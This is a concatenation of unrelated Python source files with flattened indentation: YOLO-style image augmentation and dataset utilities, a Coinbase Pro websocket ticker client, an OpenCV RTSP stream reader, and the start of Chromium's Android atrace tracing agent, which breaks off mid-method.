yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0]) # equalize Y channel histogram
return cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB) # convert YUV image to RGB
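# --- Illustrative sketch (added for exposition; not in the original file) ----
# Minimal use of hist_equalize() above on a dummy low-contrast RGB image. The
# helper name _hist_equalize_demo is hypothetical and is never called here.
def _hist_equalize_demo():
    import numpy as np  # assumed to be available, as elsewhere in this module
    im = np.random.randint(0, 128, (64, 64, 3), dtype=np.uint8)  # dark RGB image
    return hist_equalize(im, clahe=True, bgr=False)  # CLAHE on the Y channel only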
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(8)] # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8)  # base image with 9 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32):
# Resize and pad image while meeting stride-multiple constraints
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, stride), np.mod(dh, stride) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
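# --- Illustrative sketch (added for exposition; not in the original file) ----
# Demonstrates letterbox() above on a synthetic 720x1280 frame padded to a
# fixed 640x640 canvas. The helper name _letterbox_demo is hypothetical and is
# never called at import time.
def _letterbox_demo():
    import numpy as np  # assumed to be available, as elsewhere in this module
    im = np.zeros((720, 1280, 3), dtype=np.uint8)  # dummy HxWxC image
    out, ratio, (dw, dh) = letterbox(im, new_shape=640, auto=False)
    # ratio == (0.5, 0.5); out.shape == (640, 640, 3); dh is the per-side pad
    return out.shape, ratio, (dw, dh)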
def random_perspective(img, targets=(), segments=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0,
border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
use_segments = any(x.any() for x in segments)
new = np.zeros((n, 4))
if use_segments: # warp segments
segments = resample_segments(segments) # upsample
for i, segment in enumerate(segments):
xy = np.ones((len(segment), 3))
xy[:, :2] = segment
xy = xy @ M.T # transform
xy = xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2] # perspective rescale or affine
# clip
new[i] = segment2box(xy, width, height)
else: # warp boxes
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8) # perspective rescale or affine
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# clip
new[:, [0, 2]] = new[:, [0, 2]].clip(0, width)
new[:, [1, 3]] = new[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=new.T, area_thr=0.01 if use_segments else 0.10)
targets = targets[i]
targets[:, 1:5] = new[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates
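# --- Illustrative sketch (added for exposition; not in the original file) ----
# box_candidates() above takes boxes in (4, n) layout (rows x1, y1, x2, y2).
# Here the first box keeps most of its area and passes, while the second one
# collapses to a 1-pixel-high sliver and is rejected by the wh threshold. The
# helper name _box_candidates_demo is hypothetical.
def _box_candidates_demo():
    import numpy as np  # assumed to be available, as elsewhere in this module
    before = np.array([[0, 0], [0, 0], [100, 100], [100, 100]], dtype=float)
    after = np.array([[0, 0], [0, 0], [90, 100], [90, 1]], dtype=float)
    return box_candidates(before, after)  # -> array([ True, False])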
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
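# --- Illustrative sketch (added for exposition; not in the original file) ----
# cutout() above paints random masks directly into the image and returns only
# the labels that stay mostly visible (<60% obscured). Output is random by
# design; the helper name _cutout_demo is hypothetical.
def _cutout_demo():
    import numpy as np  # assumed to be available, as elsewhere in this module
    im = np.full((480, 640, 3), 127, dtype=np.uint8)               # dummy image
    labels = np.array([[0, 10, 10, 200, 200]], dtype=np.float32)   # [cls, x1, y1, x2, y2]
    kept = cutout(im, labels)
    return im, kept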
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../coco128/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)  # np.int is deprecated; use built-in int
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0)): # from utils.datasets import *; autosplit('../coco128')
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
# Arguments
path: Path to images directory
weights: Train, val, test weights (list)
"""
path = Path(path) # images dir
files = list(path.rglob('*.*'))
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
for i, img in tqdm(zip(indices, files), total=n):
if img.suffix[1:] in img_formats:
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
|
websocket.py
|
import json
import pymongo
import threading
import time
import websocket
import cbpro.auth
import cbpro.check
import cbpro.utils
def get_default_message() -> dict:
return {
'type': 'subscribe',
'product_ids': ['BTC-USD'],
'channels': ['ticker']
}
def get_message(value: dict = None) -> dict:
if value is None:
value = get_default_message()
cbpro.check.websocket_params(value)
return value
class WebsocketHeader(object):
def __init__(self,
key: str,
secret: str,
passphrase: str) -> None:
self.token = cbpro.auth.Token(key, secret, passphrase)
def __call__(self) -> dict:
timestamp = cbpro.auth.get_timestamp()
message = f'{timestamp}GET/users/self/verify'
b64signature = cbpro.auth.get_b64signature(message, self.token)
return {
'signature': b64signature,
'key': self.token.key,
'passphrase': self.token.passphrase,
'timestamp': timestamp
}
class WebsocketStream(object):
def __init__(self,
header: WebsocketHeader = None,
timeout: int = None,
traceable: bool = False) -> None:
self.header = header
self.timeout = 30 if timeout is None else timeout
self.traceable = traceable
self.url = 'wss://ws-feed.pro.coinbase.com'
self.connection = None
@property
def connected(self):
if self.connection and self.connection.connected:
return True
return False
def connect(self) -> None:
header = None if self.header is None else self.header()
websocket.enableTrace(self.traceable)
self.connection = websocket.create_connection(
url=self.url, header=header
)
def send(self, params: dict) -> None:
if self.connected:
payload = json.dumps(params)
self.connection.send(payload)
def receive(self) -> dict:
if self.connected:
payload = self.connection.recv()
return json.loads(payload)
return dict()
def ping(self) -> None:
payload = 'keepalive'
while self.connected:
if self.traceable:
print(f'[Ping] {payload} [Timeout] {self.timeout}s')
self.connection.ping(payload)
time.sleep(self.timeout)
def disconnect(self) -> None:
if self.connected:
self.connection.close()
class WebsocketEvent(object):
def on_error(self, value: str) -> None:
print(f'[Exception] {value}\n')
def on_start(self):
print(f'[Start] thread {threading.get_native_id()}')
time.sleep(1)
def on_run(self):
print(f'[Run] {threading.active_count()} active threads')
time.sleep(1)
def on_stop(self):
print(f'[Stop] thread {threading.get_native_id()}')
def on_listen(self, collection: object, value: dict) -> None:
self.on_response(value)
self.on_collection(collection, value)
def on_response(self, value: dict) -> None:
print(f'[Response] {value}')
time.sleep(1)
def on_collection(self, collection: object, value: dict) -> None:
if collection:
collection.insert_one(value)
class WebsocketClient(object):
def __init__(self,
stream: WebsocketStream,
event: WebsocketEvent = None,
collection: pymongo.collection.Collection = None) -> None:
self.stream = stream
self.collection = collection
self.running = False
self.thread = None
self.keepalive = None
self.event = WebsocketEvent() if event is None else event
def listen(self) -> None:
while self.running:
message = self.stream.receive()
if message:
self.event.on_listen(self.collection, message)
def start(self, value: dict) -> None:
self.event.on_start()
self.running = True
self.stream.connect()
self.stream.send(value)
self.listen()
def run(self, params: dict) -> None:
self.event.on_run()
self.thread = threading.Thread(target=self.start, args=(params,))
self.thread.start()
def stop(self) -> None:
self.event.on_stop()
self.running = False
self.stream.disconnect()
self.thread.join()
def websocket_client(key: str = None,
secret: str = None,
passphrase: str = None,
event: WebsocketEvent = None,
collection: pymongo.collection.Collection = None,
traceable: bool = False) -> WebsocketClient:
header = None
if key and secret and passphrase:
header = WebsocketHeader(key, secret, passphrase)
stream = WebsocketStream(header=header, traceable=traceable)
return WebsocketClient(stream, event, collection)
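# --- Usage sketch (added for exposition; not part of the original module) ----
# A minimal, unauthenticated run of WebsocketClient: subscribe to the default
# BTC-USD ticker feed, stream responses for a few seconds, then shut down. The
# 10-second runtime is an arbitrary choice for illustration.
if __name__ == '__main__':
    params = get_message()                     # default subscribe message
    client = websocket_client(traceable=False)
    client.run(params)                         # listens on a background thread
    time.sleep(10)
    client.stop()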
|
cv_videostream.py
|
# import the necessary packages
from threading import Thread
import cv2, time
import datetime
class CV_VideoStream:
""" Maintain live RTSP feed without buffering. """
def __init__(self, src=0, name="WebcamVideoStream", videocapture=cv2.VideoCapture, verbose = False ):
"""
src: the path to an RTSP server. should start with "rtsp://"
name: give it a name
verbose: print log or not
"""
self._src = src
self.name = name # initialize the thread name
self.videocapture = videocapture
self._verbose = verbose
self.fps = 0.0 # measured fps
self._stream = None
self._frame = None # returned images from stream
# initialize the variable used to indicate if the thread should be stopped
self._stopped = False
self._fps = FPS()
def start(self):
"""start the thread to read frames from the video stream"""
if self._verbose:
print(f"[INFO] connecting to Cam: {self._src}")
self._stopped = False
self._thread = Thread(target=self.update, name=self.name, args=())
self._thread.daemon = True
self._thread.start()
self._fps.start()
return self
def connect(self):
if self.isOpened():
self._stream.release()
# self._stream = cv2.VideoCapture(self._src)
self._stream = self.videocapture(self._src)  # FFMPEG will wait for 30 seconds if no connection is found
if self._verbose:
if self._stream.isOpened():
print(f"[INFO] connected to Cam: {self._src}")
print(f"[INFO]CV_VideoCapture Backend: {self._stream.getBackendName()}")
else:
print(f"[INFO] Failed to connect Cam: {self._src}")
time.sleep(1)
def update(self):
"""keep looping infinitely until the thread is stopped"""
while not self._stopped:
if self._stream is not None and self._stream.isOpened():
(self.grabbed, self._frame) = self._stream.read()
if self.grabbed:
self._fps.update()
self.last = datetime.datetime.now()
time.sleep(0.01)
else:
self.connect()
time.sleep(0.01)
# time.sleep(1)
if self._fps.elapsed() > 5:
self._fps.stop()
self.fps = self._fps.fps
print(self.fps)
if self._fps.numFrames == 0:
# if the number of frames in the last 5 seconds is 0, then reconnect
print(f"[INFO] Lost connection, retrying to connect Cam: {self._src}")
self.connect()
self._fps.start()
# if datetime.datetime.now() - self.lastaccess > 5.0:
# Thread has stopped
if self._verbose:
print(f"[INFO] Connection closed Cam: {self._src}")
def read(self):
# return the frame most recently read
self.lastaccess = datetime.datetime.now()
return self._frame
def stop(self):
# indicate that the thread should be stopped or closed
self._close()
def close(self):
# indicate that the thread should be stopped or closed
self._close()
def _close(self):
if self.isOpened():
self._stream.release()
self._stopped = True
# wait until stream resources are released (producer thread might be still grabbing frame)
# Todo this code does not always work, Thread is a daemon so closes anyhow
# if not self._thread._is_stopped:
# self._thread.join()
# else:
# pass
def isOpened(self):
try:
return self._stream is not None and self._stream.isOpened()
except:
return False
class FPS:
'''Calculate the frames per second'''
def __init__(self):
# store the start time, end time, and total number of frames
# that were examined between the start and end intervals
self._start = None
self._end = None
self.numFrames = 0
self.fps = 0.0
def start(self):
# start the timer
self._start = datetime.datetime.now()
self._end = None
self.numFrames = 0
return self
def stop(self):
# stop the timer
self._end = datetime.datetime.now()
self.fps = self.numFrames / self.elapsed()
def update(self):
# increment the total number of frames examined during the
# start and end intervals
self.numFrames += 1
# return self._numFrames
def elapsed(self):
# return the total number of seconds between the start and
# end interval
# if self._end is None:
self._end = datetime.datetime.now()
# ret = (self._end - self._start).total_seconds()
# self._end = None
# else:
# ret = (self._end - self._start).total_seconds()
return (self._end - self._start).total_seconds()
def poll_fps(self):
# compute the (approximate) frames per second without stopping
# if self._end is not None:
# return self._numFrames / self.elapsed()
# else:
self.numFrames += 1
self._end = datetime.datetime.now()
self.fps = self.numFrames / self.elapsed()
return self.fps
# self._end = None
# def fps(self):
# # compute the (approximate) frames per second, must be stopped first
# return self._numFrames / self.elapsed()
if __name__ == '__main__':
vs = CV_VideoStream(src="rtsp://192.168.183.242:554", verbose=True).start()
while (1):
frame = vs.read()
if frame is not None:
cv2.imshow('VIDEO', frame)
else:
time.sleep(0.1)
k = cv2.waitKey(10)
txt = None
if k == 27 or k == 3:
break # esc to quit
cv2.destroyAllWindows()
|
atrace_agent.py
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import optparse
import py_utils
import re
import subprocess
import sys
import threading
import zlib
from devil.android import device_utils
from py_trace_event import trace_time as trace_time_module
from systrace import trace_result
from systrace import tracing_agents
from systrace import util
# Text that ADB sends, but does not need to be displayed to the user.
ADB_IGNORE_REGEXP = r'^capturing trace\.\.\. done|^capturing trace\.\.\.'
# The number of seconds to wait on output from ADB.
ADB_STDOUT_READ_TIMEOUT = 0.2
# The adb shell command to initiate a trace.
ATRACE_BASE_ARGS = ['atrace']
# If a custom list of categories is not specified, traces will include
# these categories (if available on the device).
DEFAULT_CATEGORIES = 'sched gfx view dalvik webview input disk am wm'.split()
# The command to list trace categories.
LIST_CATEGORIES_ARGS = ATRACE_BASE_ARGS + ['--list_categories']
# Minimum number of seconds between displaying status updates.
MIN_TIME_BETWEEN_STATUS_UPDATES = 0.2
# ADB sends this text to indicate the beginning of the trace data.
TRACE_START_REGEXP = r'TRACE\:'
# Plain-text trace data should always start with this string.
TRACE_TEXT_HEADER = '# tracer'
# The property name for switching on and off tracing during boot.
BOOTTRACE_PROP = 'persist.debug.atrace.boottrace'
# The file path for specifying categories to be traced during boot.
BOOTTRACE_CATEGORIES = '/data/misc/boottrace/categories'
def list_categories(config):
"""List the possible trace event categories.
This function needs the tracing config since it needs to get the serial
number of the device to send a command to.
Args:
config: Tracing config.
"""
devutils = device_utils.DeviceUtils(config.device_serial_number)
print '\n'.join(devutils.RunShellCommand(LIST_CATEGORIES_ARGS))
if not devutils.HasRoot():
print '\nNOTE: more categories may be available with adb root\n'
def get_available_categories(config):
"""Gets the list of atrace categories available for tracing.
Args:
config: Tracing config.
"""
devutils = device_utils.DeviceUtils(config.device_serial_number)
categories_output = devutils.RunShellCommand(LIST_CATEGORIES_ARGS)
return [c.split('-')[0].strip() for c in categories_output]
def try_create_agent(config):
"""Create an Atrace agent.
Args:
config: Command line config.
"""
if config.target != 'android':
return None
if config.from_file is not None:
return None
# Check device SDK version.
device_sdk_version = util.get_device_sdk_version()
if device_sdk_version <= 17:
print ('Device SDK versions <= 17 not supported.\n'
'Your device SDK version is %d.' % device_sdk_version)
return None
if device_sdk_version <= 22 and config.boot:
print ('--boot option does not work on devices with SDK '
'version 22 or earlier.\nYour device SDK version '
'is %d.' % device_sdk_version)
return None
return BootAgent() if config.boot else AtraceAgent()
def _construct_extra_atrace_args(config, categories):
"""Construct extra arguments (-a, -k, categories) for atrace command.
Args:
config: Tracing config.
"""
extra_args = []
if config.app_name is not None:
extra_args.extend(['-a', config.app_name])
if config.kfuncs is not None:
extra_args.extend(['-k', config.kfuncs])
extra_args.extend(categories)
return extra_args
def _construct_atrace_args(config, categories):
"""Builds the command used to invoke a trace process.
Returns:
A tuple where the first element is an array of command arguments, and
the second element is a boolean which will be true if the command will
stream trace data.
"""
atrace_args = ATRACE_BASE_ARGS[:]
if config.compress_trace_data:
atrace_args.extend(['-z'])
if (config.trace_time is not None) and (config.trace_time > 0):
atrace_args.extend(['-t', str(config.trace_time)])
if (config.trace_buf_size is not None) and (config.trace_buf_size > 0):
atrace_args.extend(['-b', str(config.trace_buf_size)])
elif 'sched' in categories:
# 'sched' is a high-volume tag, double the default buffer size
# to accommodate that
atrace_args.extend(['-b', '4096'])
extra_args = _construct_extra_atrace_args(config, categories)
atrace_args.extend(extra_args)
return atrace_args
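# --- Illustrative sketch (added for exposition; not in the original file) ----
# Shows the command line _construct_atrace_args() builds for a hypothetical
# config: a 10 s compressed trace with no explicit buffer size, so the 'sched'
# buffer bump applies. _FakeConfig only mimics the attributes read above.
def _construct_atrace_args_demo():
    class _FakeConfig(object):
        compress_trace_data = True
        trace_time = 10
        trace_buf_size = None
        app_name = None
        kfuncs = None
    return _construct_atrace_args(_FakeConfig(), ['sched', 'gfx'])
    # -> ['atrace', '-z', '-t', '10', '-b', '4096', 'sched', 'gfx']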
class AtraceAgent(tracing_agents.TracingAgent):
def __init__(self):
super(AtraceAgent, self).__init__()
self._adb = None
self._trace_data = None
self._tracer_args = None
self._collection_thread = None
self._device_utils = None
self._device_serial_number = None
self._config = None
self._categories = None
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StartAgentTracing(self, config, timeout=None):
self._config = config
self._categories = config.atrace_categories
if not self._categories:
self._categories = DEFAULT_CATEGORIES
avail_cats = get_available_categories(config)
unavailable = [x for x in self._categories if x not in avail_cats]
self._categories = [x for x in self._categories if x in avail_cats]
if unavailable:
print 'These categories are unavailable: ' + ' '.join(unavailable)
self._device_utils = device_utils.DeviceUtils(config.device_serial_number)
self._device_serial_number = config.device_serial_number
self._tracer_args = _construct_atrace_args(config,
self._categories)
self._device_utils.RunShellCommand(self._tracer_args + ['--async_start'])
return True
def _collect_and_preprocess(self):
"""Collects and preprocesses trace data.
Stores results in self._trace_data.
"""
trace_data = self._collect_trace_data()
self._trace_data = self._preprocess_trace_data(trace_data)
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StopAgentTracing(self, timeout=None):
"""Stops tracing and starts collecting results.
To synchronously retrieve the results after calling this function,
call GetResults().
"""
self._collection_thread = threading.Thread(
target=self._collect_and_preprocess)
self._collection_thread.start()
return True
@py_utils.Timeout(tracing_agents.GET_RESULTS_TIMEOUT)
def GetResults(self, timeout=None):
"""Waits for collection thread to finish and returns trace results."""
self._collection_thread.join()
self._collection_thread = None
return trace_result.TraceResult('systemTraceEvents', self._trace_data)
def SupportsExplicitClockSync(self):
return True
def RecordClockSyncMarker(self, sync_id, did_record_sync_marker_callback):
"""Records a clock sync marker.
Args:
sync_id: ID string for clock sync marker.
"""
cmd = 'echo trace_event_clock_sync: name=%s >' \
' /sys/kernel/debug/tracing/trace_marker' % sync_id
with self._device_utils.adb.PersistentShell(
self._device_serial_number) as shell:
